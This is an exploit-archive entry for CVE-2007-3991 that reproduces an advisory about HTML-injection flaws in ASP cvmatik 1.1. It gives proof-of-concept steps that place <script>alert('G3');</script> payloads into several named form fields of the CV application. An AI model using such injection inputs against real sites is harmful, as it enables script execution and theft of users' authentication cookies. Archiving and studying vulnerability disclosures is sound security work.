ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities



EKU-ID: 35411 CVE: CVE-2007-3991;OSVDB-36471 OSVDB-ID:
Author: GeFORC3 Published: 2007-07-23 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/25008/info

Asp cvmatik is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

Asp cvmatik 1.1 is vulnerable.

<html><head></head><body>1-http://www.example.com/cv.asp

You write xss code in  page's text box

Adý <script>alert("G3");</script>
or
Soyadý<script>alert("G3");</script>
or
Ehliyet  <script>alert("G3");</script>
or
Askerlik    <script>alert("G3");</script>
or
GSM   <script>alert("G3");</script>
etc...

Press to "tamam"(ok) button.

2-next page

</body></html>